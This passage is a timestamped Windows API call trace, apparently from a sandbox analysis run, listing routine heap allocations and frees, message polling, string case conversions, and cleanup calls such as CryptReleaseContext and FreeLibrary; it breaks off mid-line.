[0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0257.327] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.327] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.328] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.328] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.328] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.328] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0257.328] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.328] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.329] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.329] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.329] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.329] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.329] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0257.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.330] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.330] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.330] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.330] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0257.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.332] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.332] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.333] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.333] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.333] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.333] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.334] FreeLibrary (hLibModule=0x74d40000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.336] CloseHandle (hObject=0x2cc) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0257.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0257.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0257.341] HeapFree (in: 